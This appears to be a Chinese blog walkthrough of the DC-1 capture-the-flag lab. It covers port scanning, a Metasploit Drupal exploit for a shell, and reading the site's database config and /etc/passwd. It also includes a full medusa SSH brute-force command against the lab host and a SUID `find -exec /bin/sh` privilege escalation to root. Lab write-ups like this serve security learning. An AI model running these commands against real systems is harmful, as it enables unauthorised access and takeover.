今天来进行CTF的小测试题,DC靶场1,难度不高,最适合我这种萌小新了。

安装上ova虚拟包,看看访问正常不正常

正常,上nmap扫描一下端口

回到网站,查看robots.txt,看看有没有什么有用的信息

比我还白,,,

似乎是有一个古老的漏洞CVE,拿MSF打一下看看,搜索drupal

开干,获取相应。然后Getshell

这是撒?,这奇妙的名字,读取一波看看

通过百度可知drupal的数据库配置文件在/sites/default/settings.php

真是有趣,爆破、、、

远程连接暂时不得动。

不如来查看etc/passwd

emmmmm

这是啥啊?

根据flag2提示暴力破解flag4账户密码,利用自带的medusa+John the Ripper

medusa -M ssh -h 192.168.75.135 -u flag4 -P /usr/share/john/password.lst -e ns -F 

-M: 表示你要破解的类型。
-h:目标机器地址。
-u:用户名。
-e : 尝试空密码。
-F:破解成功后立即停止破解。
-v:显示破解过程。

very nice 但是确定是让我爆破?

ssh连接目标

emmmm。不是root玩毛线

要想有root权限:
1 以root账户登录(尝试使用爆破未果)
2 普通用户登录,查找具有suid权限位的命令去get shell
suid权限位:说明可以以root权限执行命令
可我这种垃圾怎么会提权,呜呜呜

find / -type f -perm -u=s 2>/dev/null

find / -type f -name shell -exec “whoami” \;

我也不知道为什么要用find 哈哈哈

这这这。。。root权限?

find / -type f -name shell -exec “/bin/sh” \;

跑一波sh试试

搞定。。。


天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

一人自负一阴阳,混沌分开气升降。炼阴仙客解冲虚,凡骨尤能化百族。雷域龙神启太元,天清升仙出浩渊。

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注